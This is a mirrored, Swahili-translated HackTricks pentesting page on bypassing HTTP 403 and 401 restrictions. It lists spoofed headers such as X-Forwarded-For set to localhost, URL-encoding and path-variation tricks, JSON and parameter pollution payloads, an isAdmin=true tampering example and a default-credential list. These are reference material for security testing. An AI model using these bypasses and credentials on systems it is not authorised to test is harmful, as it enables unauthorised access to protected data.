Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-18 15:08:29 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/403-and-401-bypasses.md
Translator workflow 54a7bb5de7 Translated to Swahili
2024-02-11 02:13:58 +00:00

8.8 KiB
Raw Blame History

Kuvuka 403 & 401

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Usanidi uliopo mara moja kwa tathmini ya udhaifu na upenyezaji wa mtihani. Fanya pentest kamili kutoka mahali popote na zana na huduma 20+ ambazo zinaenda kutoka kwa uchunguzi hadi ripoti. Hatuchukui nafasi ya wapenyezaji - tunatengeneza zana za desturi, moduli za ugunduzi na uvamizi ili kuwapa muda wa kuchimba kwa kina, kuvunja kabati, na kufurahi.

{% embed url="https://pentest-tools.com/" %}

Fuzzing ya Verbs/Methods ya HTTP

Jaribu kutumia verbi tofauti kufikia faili: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK

  • Angalia vichwa vya majibu, labda habari fulani inaweza kutolewa. Kwa mfano, majibu ya 200 kwa HEAD na Content-Length: 55 inamaanisha kuwa verb ya HEAD inaweza kupata habari hiyo. Lakini bado unahitaji kupata njia ya kuihamisha habari hiyo.
  • Kutumia kichwa cha HTTP kama X-HTTP-Method-Override: PUT inaweza kubadilisha verb iliyotumiwa.
  • Tumia verb ya TRACE na ikiwa una bahati sana labda kwenye majibu unaweza kuona pia vichwa vilivyotolewa na wakala wa kati ambavyo vinaweza kuwa na manufaa.

Fuzzing ya Vichwa vya HTTP

  • Badilisha kichwa cha Mwenyeji na thamani isiyojulikana (ambayo ilifanya kazi hapa)

  • Jaribu kutumia Wateja Wengine kufikia rasilimali.

  • Fuzz Vichwa vya HTTP: Jaribu kutumia Vichwa vya HTTP vya Proksi, Uthibitishaji wa HTTP wa Msingi na NTLM nguvu ya kubadilisha (na mchanganyiko mdogo tu) na mbinu zingine. Kufanya haya yote nimeunda zana fuzzhttpbypass.

  • X-Originating-IP: 127.0.0.1

  • X-Forwarded-For: 127.0.0.1

  • X-Forwarded: 127.0.0.1

  • Forwarded-For: 127.0.0.1

  • X-Remote-IP: 127.0.0.1

  • X-Remote-Addr: 127.0.0.1

  • X-ProxyUser-Ip: 127.0.0.1

  • X-Original-URL: 127.0.0.1

  • Client-IP: 127.0.0.1

  • True-Client-IP: 127.0.0.1

  • Cluster-Client-IP: 127.0.0.1

  • X-ProxyUser-Ip: 127.0.0.1

  • Host: localhost

Ikiwa njia imekingwa, unaweza jaribu kuvuka ulinzi wa njia kwa kutumia vichwa vingine hivi:

  • X-Original-URL: /admin/console
  • X-Rewrite-URL: /admin/console
  • Ikiwa ukurasa uko nyuma ya wakala, labda ni wakala ndiye anayekuzuia kufikia habari ya kibinafsi. Jaribu kutumia HTTP Request Smuggling au vichwa vya hop-by-hop.
  • Fuzz vichwa vya HTTP maalum ukitafuta majibu tofauti.
  • Fuzz vichwa vya HTTP maalum wakati wa kufanya fuzzing ya Verbs za HTTP.
  • Ondoa kichwa cha Mwenyeji na labda utaweza kuvuka ulinzi.

Fuzzing ya Njia

Ikiwa /njia imezuiliwa:

  • Jaribu kutumia /%2e/njia _(ikiwa ufikiaji umefungwa na wakala, hii inaweza kuvuka ulinzi). Jaribu pia**_** /%252e**/njia (URL encode mara mbili)
  • Jaribu kuvuka Unicode: /%ef%bc%8fnjia (Herufi zilizo na URL zimekodishwa kama "/") kwa hivyo wakati zinakodishwa tena itakuwa //njia na labda tayari umeshavuka ukaguzi wa jina la /njia
  • Kuvuka njia nyingine:
  • site.com/siri > HTTP 403 Imezuiwa
  • site.com/SIRI > HTTP 200 Sawa
  • site.com/siri/ > HTTP 200 Sawa
  • site.com/siri/. > HTTP 200 Sawa
  • site.com//siri// > HTTP 200 Sawa
  • site.com/./siri/.. > HTTP 200 Sawa
  • site.com/;/siri > HTTP 200 Sawa
  • site.com/.;/siri > HTTP 200 Sawa
  • site.com//;//siri > HTTP 200 Sawa
  • site.com/siri.json > HTTP 200 Sawa (ruby)
  • Tumia orodha hii yote katika hali zifuatazo:
  • /FUZZsiri
  • /FUZZ/siri
  • /siriFUZZ
  • Kuvuka API nyingine:
  • /v3/users_data/1234 --> 403 Imezuiwa
  • /v1/users_data/1234 --> 200 Sawa
  • {“id”:111} --> 401 Haujaidhinishwa
  • {“id”:[111]} --> 200 Sawa
  • {“id”:111} --> 401 Haujaidhinishwa
  • {“id”:{“id”:111}} --> 200 Sawa
  • {"user_id":"<legit_id>","user_id":"<victims_id>"} (Uchafuzi wa Parameta ya JSON)
  • user_id=ATTACKER_ID&user_id=VICTIM_ID (Uchafuzi wa Parameta)

Ubadilishaji wa Parameta

  • Badilisha parameta ya thamani: Kutoka id=123 --> id=124
  • Ongeza parameta nyingine kwenye URL: ?id=124 —-> id=124&isAdmin=true
  • Ondoa parameta
  • Panga upya parameta
  • Tumia herufi maalum.
  • Fanya jaribio la mipaka kwenye parameta - toa thamani kama -234 au 0 au 99999999 (thamani za mfano tu).

Toleo la Itifaki

Ikiwa unatumia HTTP/1.1 jaribu kutumia 1.0 au hata jaribu kama ina unga mkono 2.0.

Bypassing Nyingine

  • Pata IP au CNAME ya kikoa na jaribu kuwasiliana moja kwa moja.
  • Jaribu kuishinikiza seva kwa kutuma maombi ya kawaida ya GET (Ilifanya kazi kwa mtu huyu na Facebook).
  • Badilisha itifaki: kutoka http kwenda https, au kutoka https kwenda http
  • Nenda kwenye https://archive.org/web/ na angalia ikiwa hapo awali faili hiyo ilikuwa inapatikana kwa ulimwengu.

Brute Force

  • Ghushi nywila: Jaribu nywila za kawaida zifuatazo. Je, unajua kitu kuhusu mwathiriwa? Au jina la changamoto ya CTF?
  • Brute force: Jaribu uwakilishi wa msingi, digest na NTLM.

{% code title="Nywila za Kawaida" %}

admin    admin
admin    password
admin    1234
admin    admin1234
admin    123456
root     toor
test     test
guest    guest

{% endcode %}

Zana za Kiotomatiki

Usanidi uliopo mara moja kwa tathmini ya udhaifu na upimaji wa uingiliaji. Tekeleza upimaji kamili kutoka mahali popote na zana na huduma 20+ ambazo zinaanzia uchunguzi hadi ripoti. Hatuchukui nafasi ya wapenyezaji - tunatengeneza zana za desturi, moduli za ugunduzi na uvamizi ili kuwapa muda wa kuchimba kwa kina, kuvunja mfumo, na kufurahi.

{% embed url="https://pentest-tools.com/" %}

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks: